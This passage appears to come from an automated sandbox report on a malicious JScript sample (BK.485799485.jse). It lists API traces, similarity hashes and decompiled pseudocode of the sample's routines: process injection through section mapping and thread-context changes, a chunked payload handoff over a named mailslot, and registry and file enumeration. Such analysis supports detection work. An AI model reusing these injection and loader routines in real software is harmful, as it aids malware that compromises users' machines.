  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 111post.exe Analysis ID: 66610

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:2E3FB8B38E59480ED8F47449A46E2082
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:66610
Initial sample SHA 256:74D71096AB1B39E13C4299E7A35A9809B0825E1F9ECD13D982A07F64092F4A7A
Initial sample name:BK.485799485.jse

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
